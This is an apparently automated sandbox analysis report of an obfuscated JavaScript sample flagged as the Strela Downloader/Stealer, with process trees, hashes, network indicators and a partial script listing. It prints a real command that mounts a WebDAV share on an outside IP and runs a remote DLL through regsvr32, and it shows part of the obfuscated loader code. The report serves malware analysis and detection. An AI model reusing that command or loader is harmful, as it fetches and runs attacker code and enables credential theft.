Windows
Analysis Report
2971435162666519472.js
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 984 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\29714 3516266651 9472.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 3808 cmdline:
"C:\Window s\System32 \cmd.exe" /c cmd /c net use \\ 193.143.1. 231@8888\d avwwwroot\ &&cmd /c r egsvr32 /s \\193.143 .1.231@888 8\davwwwro ot\2226427 36821410.d ll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Michael Haag: |
Source: | Author: frack113: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Click to jump to signature section
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: | ||
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Mutant created: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Thread injection, dropped files, key value created, disk infection and DNS query: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 12 Scripting | Valid Accounts | Windows Management Instrumentation | 12 Scripting | 11 Process Injection | 1 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | 11 Non-Standard Port | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 2 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.231 | unknown | unknown | 57271 | BITWEB-ASRU | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1577454 |
Start date and time: | 2024-12-18 13:41:31 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 2m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2971435162666519472.js |
Detection: | MAL |
Classification: | mal72.rans.troj.spyw.evad.winJS@8/0@0/1 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- VT rate limit hit for: 2971435162666519472.js
Time | Type | Description |
---|---|---|
07:42:28 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.231 | Get hash | malicious | Strela Downloader, Strela Stealer | Browse |
| |
Get hash | malicious | Strela Downloader, Strela Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader, Strela Stealer | Browse |
| |
Get hash | malicious | Strela Downloader, Strela Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
File type: | |
Entropy (8bit): | 4.830378830920875 |
TrID: | |
File name: | 2971435162666519472.js |
File size: | 13'029 bytes |
MD5: | d5cc72873b9b26833ee92e4c831c4eda |
SHA1: | 15f9ae15690a8673bd299294064f5e7af5992750 |
SHA256: | 40fd4d27c0a600234b65d2379776c94c8ede1f3e18fe01eb57f06f7913dd1dd9 |
SHA512: | 78a8c1571960081becea275ce1687970bf5c988ccd79f06017286697b5a2e8d3b75b4c151723049bf1818706dbbe57b6ef56c03bfaf953d2565a9272f453adf5 |
SSDEEP: | 384:EXx91qXAZZ2ZZcQHK6btZY1b4lQHK6bt1XIE5Xf:bE5Xf |
TLSH: | 4E42EE88AA26DB7E47E8C3AE556F380254F48F6C1D70C77AC57FE54700B1BE588E9260 |
File Content Preview: | function vjcuinvfp(){this[rbktsrbhk+fnucaons+qozwbvlw+vwgmjzlo](iwedatboe+ygzoksh+bdtedewrq+zbgfuja+hbmpxagw+gsmbtvq+lchfe+iwedatboe+smxtnv+kjisgyz+smxtnv+edsnt+odjkdymh+fnucaons+qjgmfvcu+lpjlp+qwdhxlhsg+qwdhxlhsg+nupmhi+edsnt+vwgmjzlo+zxfxct+sbszjfzf+win |
Icon Hash: | 68d69b8bb6aa9a86 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 18, 2024 13:42:27.654928923 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231 |
Dec 18, 2024 13:42:27.775741100 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5 |
Dec 18, 2024 13:42:27.775897980 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231 |
Dec 18, 2024 13:42:27.776129007 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231 |
Dec 18, 2024 13:42:27.897346020 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5 |
Dec 18, 2024 13:42:29.271722078 CET | 8888 | 49704 | 193.143.1.231 | 192.168.2.5 |
Dec 18, 2024 13:42:29.312638998 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231 |
Dec 18, 2024 13:42:29.317867041 CET | 49704 | 8888 | 192.168.2.5 | 193.143.1.231 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49704 | 193.143.1.231 | 8888 | 3876 | C:\Windows\System32\net.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Dec 18, 2024 13:42:27.776129007 CET | 107 | OUT | |
Dec 18, 2024 13:42:29.271722078 CET | 237 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 07:42:25 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff63bc30000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 07:42:26 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff791dd0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 07:42:26 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6d64d0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 07:42:26 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff791dd0000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 07:42:26 |
Start date: | 18/12/2024 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff679eb0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function vjcuinvfp() { |
|
1 | this[rbktsrbhk + fnucaons + qozwbvlw + vwgmjzlo] ( iwedatboe + ygzoksh + bdtedewrq + zbgfuja + hbmpxagw + gsmbtvq + lchfe + iwedatboe + smxtnv + kjisgyz + smxtnv + edsnt + odjkdymh + fnucaons + qjgmfvcu + lpjlp + qwdhxlhsg + qwdhxlhsg + nupmhi + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + qrlqb + qjgmfvcu + iwedatboe + rbktsrbhk + qjgmfvcu + rbktsrbhk + pfhej + gsmbtvq + igispruv + edsnt + qjgmfvcu + qrlqb + qjgmfvcu + vwgmjzlo + qwdhxlhsg + fnucaons + smxtnv + smxtnv + odjkdymh + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + tcpbwcfzj + hbmpxagw + qwdhxlhsg + winfhg + qjgmfvcu + sbszjfzf + jyxuzotq + gsmbtvq + vwgmjzlo + iwedatboe + iwedatboe + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + igispruv + lchfe + kjisgyz + pfhej + qrlqb + fnucaons + vwgmjzlo + pfhej + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + bdtedewrq + zbgfuja + rbktsrbhk + iwedatboe + qozwbvlw + bdtedewrq + edsnt + igispruv + gsmbtvq + vwgmjzlo + igispruv + qrlqb + edsnt + odjkdymh + qwdhxlhsg + dbdluvxxn + jyxuzotq + ygzoksh + bdtedewrq + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + tcpbwcfzj + lqsfs + gsmbtvq + lchfe + iwedatboe + smxtnv + kjisgyz + smxtnv + edsnt + odjkdymh + fnucaons + qjgmfvcu + lpjlp + qwdhxlhsg + qwdhxlhsg + nupmhi + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + qrlqb + qjgmfvcu + iwedatboe + rbktsrbhk + qjgmfvcu + rbktsrbhk + pfhej + gsmbtvq + igispruv + edsnt + qjgmfvcu + qrlqb + qjgmfvcu + vwgmjzlo + qwdhxlhsg + fnucaons + smxtnv + smxtnv + odjkdymh + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + odjkdymh + fnucaons + qjgmfvcu + lpjlp + qwdhxlhsg + qwdhxlhsg + nupmhi + edsnt + sbszjfzf + lpjlp + kjisgyz + lchfe + zxfxct + zbgfuja + ygzoksh + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + fnucaons + pfhej + lpjlp + jyxuzotq + nupmhi + kjisgyz + vwgmjzlo + lchfe + edsnt + fnucaons + pfhej + lpjlp + jyxuzotq + nupmhi + kjisgyz + vwgmjzlo + lchfe + pxdyztl + hbmpxagw + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + igispruv + pfhej + qjgmfvcu + ygzoksh + smxtnv + vwgmjzlo + ygzoksh + zbgfuja + lpjlp + edsnt + lchfe + qjgmfvcu + nupmhi + zxfxct + qjgmfvcu + sbszjfzf + jyxuzotq + ygzoksh + tcpbwcfzj + lqsfs + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + nupmhi + sbszjfzf + smxtnv + qwdhxlhsg + kjisgyz + lchfe + iwedatboe + igispruv + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + qrlqb + lpjlp + smxtnv + dbdluvxxn + bdtedewrq + qjgmfvcu + qwdhxlhsg + lpjlp + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + nupmhi + sbszjfzf + smxtnv + qwdhxlhsg + kjisgyz + lchfe + iwedatboe + igispruv + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + qrlqb + lpjlp + smxtnv + dbdluvxxn + bdtedewrq + qjgmfvcu + qwdhxlhsg + lpjlp + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + lchfe + qjgmfvcu + nupmhi + zxfxct + qjgmfvcu + sbszjfzf + jyxuzotq + ygzoksh + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + igispruv + pfhej + qjgmfvcu + ygzoksh + smxtnv + vwgmjzlo + ygzoksh + zbgfuja + lpjlp + edsnt + kjisgyz + qrlqb + lpjlp + winfhg + qwdhxlhsg + nupmhi + qozwbvlw + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + zbgfuja + zxfxct + zxfxct + odjkdymh + zxfxct + qjgmfvcu + winfhg + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + lpjlp + dbdluvxxn + winfhg + rbktsrbhk + jyxuzotq + sbszjfzf + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + winfhg + kjisgyz + vwgmjzlo + qjgmfvcu + iwedatboe + winfhg + ygzoksh + rbktsrbhk + igispruv + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + lpjlp + fnucaons + ygzoksh + jyxuzotq + lchfe + lpjlp + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + igispruv + lchfe + kjisgyz + pfhej + qrlqb + fnucaons + vwgmjzlo + pfhej + edsnt + winfhg + odjkdymh + qwdhxlhsg + lkyfppw + qozwbvlw + lchfe + odjkdymh + zbgfuja + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + dbdluvxxn + winfhg + ygzoksh + rbktsrbhk + nupmhi + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + vwgmjzlo + lkyfppw + ygzoksh + winfhg + rbktsrbhk + edsnt + vwgmjzlo + lkyfppw + ygzoksh + winfhg + rbktsrbhk + edsnt + bdtedewrq + pfhej + rbktsrbhk + qjgmfvcu + qozwbvlw + iwedatboe + qrlqb + lchfe + rbktsrbhk + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + jyxuzotq + zbgfuja + sbszjfzf + dbdluvxxn + kjisgyz + gsmbtvq + dbdluvxxn + fnucaons + edsnt + jyxuzotq + zbgfuja + sbszjfzf + dbdluvxxn + kjisgyz + gsmbtvq + dbdluvxxn + fnucaons + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + nupmhi + sbszjfzf + smxtnv + qwdhxlhsg + kjisgyz + lchfe + iwedatboe + igispruv + edsnt + igispruv + nupmhi + lpjlp + jyxuzotq + winfhg + fnucaons + lkyfppw + qwdhxlhsg + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + qrlqb + lpjlp + smxtnv + dbdluvxxn + bdtedewrq + qjgmfvcu + qwdhxlhsg + lpjlp + edsnt + vwgmjzlo + zxfxct + sbszjfzf + winfhg + dbdluvxxn + dbdluvxxn + pfhej + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + gsmbtvq + qrlqb + zxfxct + iwedatboe + zbgfuja + gsmbtvq + qrlqb + ygzoksh + zxfxct + edsnt + vwgmjzlo + dbdluvxxn + nupmhi + vwgmjzlo + dbdluvxxn + edsnt + kjisgyz + qrlqb + lpjlp + winfhg + qwdhxlhsg + nupmhi + qozwbvlw + edsnt + winfhg + odjkdymh + qwdhxlhsg + lkyfppw + qozwbvlw + lchfe + odjkdymh + zbgfuja + edsnt + lpjlp + zbgfuja + jyxuzotq + qrlqb + iwedatboe + fnucaons + igispruv + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + qrlqb + lpjlp + smxtnv + dbdluvxxn + bdtedewrq + qjgmfvcu + qwdhxlhsg + lpjlp + edsnt + kjisgyz + qrlqb + lpjlp + winfhg + qwdhxlhsg + nupmhi + qozwbvlw + edsnt + fnucaons + ygzoksh + lpjlp + gsmbtvq + vwgmjzlo + qrlqb + jyxuzotq + lkyfppw + fnucaons + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + sbszjfzf + ygzoksh + dbdluvxxn + sbszjfzf + vwgmjzlo + fnucaons + smxtnv + zbgfuja + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + zbgfuja + zxfxct + zxfxct + odjkdymh + zxfxct + qjgmfvcu + winfhg + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + lpjlp + dbdluvxxn + winfhg + rbktsrbhk + jyxuzotq + sbszjfzf + edsnt + bdtedewrq + gsmbtvq + ygzoksh + qrlqb + smxtnv + dbdluvxxn + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + igispruv + vwgmjzlo + gsmbtvq + fnucaons + lchfe + vwgmjzlo + rbktsrbhk + zbgfuja + edsnt + smxtnv + lpjlp + lchfe + lkyfppw + jyxuzotq + edsnt + rbktsrbhk + bdtedewrq + jyxuzotq + nupmhi + jyxuzotq + fnucaons + winfhg + nupmhi + smxtnv + edsnt + bdtedewrq + gsmbtvq + 